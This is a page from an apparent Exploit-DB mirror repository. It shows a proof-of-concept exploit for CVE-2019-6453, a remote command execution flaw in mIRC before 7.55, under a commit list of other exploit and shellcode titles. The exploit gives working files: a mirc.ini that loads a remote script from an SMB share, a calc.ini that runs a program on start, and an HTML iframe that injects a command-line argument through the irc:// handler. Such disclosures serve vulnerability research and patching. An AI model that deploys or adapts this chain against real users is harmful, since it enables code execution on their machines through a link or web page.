bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/46392.txt
Offensive Security cd868436ff DB: 2019-02-19 
25 changes to exploits/shellcodes

Realterm Serial Terminal 2.0.0.70 - Denial of Service
Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH)
NBMonitor 1.6.5.0 - 'Key' Denial of Service (PoC)
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process

mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers
qdPM 9.1 - 'type' Cross-Site Scripting
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting
Master IP CAM 01 3.3.4.2103 - Remote Command Execution
MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module
CMSsite 1.0 - 'post' SQL Injection
M/Monit 3.7.2 - Privilege Escalation
Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload
Apache CouchDB 2.3.0 - Cross-Site Scripting
ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting
Comodo Dome Firewall 2.7.0 - Cross-Site Scripting
Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload
WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing

macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)
macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)
macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
2019-02-19 05:02:08 +00:00

100 lines
No EOL
2.7 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: RCE on mIRC <7.55 using argument injection through custom URI protocol handlers
# Date: 18/02/2019
# Exploit Author: https://twitter.com/proofofcalc/
# Vendor Homepage: https://www.mirc.com
# Software Link: https://www.mirc.com/get.php
# Version: < 7.55
# Tested on: Windows
# CVE : CVE-2019-6453
RCE through URI protocol handlers on mIRC <7.55 (CVE-2019-6453)
===============================================================
Severity: High
mIRC has been shown to be vulnerable to argument injection through its
associated URI protocol handlers that improperly escape their parameters.
Usingavailable command-line parameters, an attacker is able to load a remote
configuration file and to automatically run arbitrary code.
Because mIRC doesn't use any kind of sigil such as -- to mark
the end of the argument list, an attacker is able to pass arguments to mIRC
through a irc:// link and execute arbitrary code by loading a custom
mirc.ini
from an attacker-controlled Samba file server. Please note that ircs://
works
the same way.
PoC
===
The proof of calc requires three files: mirc.ini, calc.ini and poc.html.
We assume a Samba file server is running on the attacker's side. For the
sake of the example, the following pieces of code assume it is running on
host 127.0.0.1 (i.e. replace 127.0.0.1 by your own server's address in
the following files to try this out).
mirc.ini
========
mirc.ini is a custom configuration file that should be located at
C:\mirc-poc\mirc.ini
on the file server.
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini
calc.ini
========
calc.ini is a remote script file that should be located at
C:\mirc-poc\calc.ini on the
file server.
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}
poc.html
========
Just visiting poc.html should work assuming mIRC is set as the default
handler for the
irc:// URI scheme and the browser does not encode the payload. Depending
on the browser
and your configuration, you might still get a prompt (not the case on
Firefox).
<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini' />
Affected versions
=================
This PoC runs for mIRC <7.55.
You can trigger the PoC on Edge 42.17134 (last preview version) and
Firefox 64.0.2
(last release). It doesn't work on Chrome because the way Chrome handle
URI protocols
(URI is encoded before being passed to the application).
References
==========
Further explanation (including proof of concept code):
Write-up:
https://proofofcalc.com/cve-2019-6453-mIRC/
PoC:
https://github.com/proofofcalc/cve-2019-6453-poc
mIRC changelog:
https://www.mirc.com/whatsnew.txt
Authors
=======
Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)
Reference in a new issue View git blame Copy permalink